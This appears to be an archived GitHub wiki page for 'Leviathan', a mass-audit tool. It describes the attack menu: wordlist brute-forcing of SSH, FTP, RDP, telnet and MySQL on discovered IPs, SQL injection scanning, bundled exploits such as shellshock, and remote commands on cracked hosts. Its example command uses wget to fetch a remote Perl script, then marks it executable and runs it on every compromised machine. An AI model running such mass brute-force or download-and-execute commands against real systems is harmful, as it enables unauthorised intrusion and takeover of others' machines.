Skip to content
This repository has been archived by the owner on Jan 25, 2019. It is now read-only.

Attack Menu

Jump to bottom
Utku Sen edited this page Apr 26, 2017 · 1 revision

Video Demo: https://www.youtube.com/watch?v=pxad6OwQieE

In Attack module, you can run specific attacks to the targets which are discovered in Discovery module. If you don't have any discovered targets, you can't run attacks. Please visit "Discovery" page for this.

Successful attacks are saved under /assets/compromised folder with following format:

compromisemethod_service_discoveryid.txt

Example: ncrack_ssh_8593212.txt

Using Brute Force

In 'Brute Force' section you can make brute force attacks for following protocols: ftp, ssh, telnet, rdp, mysql. The wordlists which will be used for brute force attack are listed under /config/wordlists folder. You can edit them if you want to use different combinations.

Successful brute force attacks are saved in following format:

username:password:IP_ADDRESS

For example: root:123456:1.1.1.1

Attack by Discovery id

In this section you can run brute force attacks by providing a discovery id. To obtain discovery id of a scan, please visit "Assets" menu. For example, you run a scan with Censys for ssh service. Go to "Assets" menu and follow this menus: "Show discovered machines" --> "ssh" It will list you something like this:

ID:8275412 | Protocol:ssh | Method:censys | Date:Mon Apr 10 16:47:31 2017

Copy ID section (8275412) and use it in the Brute Force/Attack by Discovery id. Leviathan automatically run a brute force attack for those discovered. IP addresses.

Attack all discovered machines by Protocol

In this section you don't need to provide a discovery id. You need to select a protocol (For example:ssh) and Leviathan runs brute force attacks for all discovered IP addresses which runs SSH.

Web(SQL Injection)

In this section you can search for SQL Injection vulnerabilities on pre-discovered URLs. If target URL is vulnerable to SQL Injection, Leviathan will save the URL under /assets/compromised folder as it's written above.

Same as Brute Force section, you have two option to continue:

1)Attack by Discovery id

2)Attack all discovered machines

The details are same with Brute Force section.

Running Custom Exploits

Available exploits are located under /lib/exploits folder. If you want to implement your own exploit, you need to put it on that directory. For more information about writing custom exploits, please visit "Writing Custom Exploits" page.

For running an integrated exploit, reach Attack then Custom Exploit section from Main Menu. In here, you need to provide discovery id of the targets. If you don't have information about discovery ids, please visit "Assets" section.

After providing discovery id, you need to select which exploit will run against the targets. Type the exploit name (Example:shellshock) and press enter.

Running Remote Commands

In 'Run remote command' section you can execute commands remotely on compromised machines. You need to crack SSH passwords in Brute Force section in order to use this section.

Same as Brute Force and Web section, you have two option to continue:

1)Run Command by Discovery id

2)Run Command on all discovered machines

Obtaining discovery id and details are explained in Brute Force section.

Following example shows how to run a command on all cracked ssh services (Only Unix Bash commands are supported)

-Select option 2 in the menu-

Enter your command: wget http://utkusen.com/s.pl && chmod +x s.pl && ./s.pl

Clone this wiki locally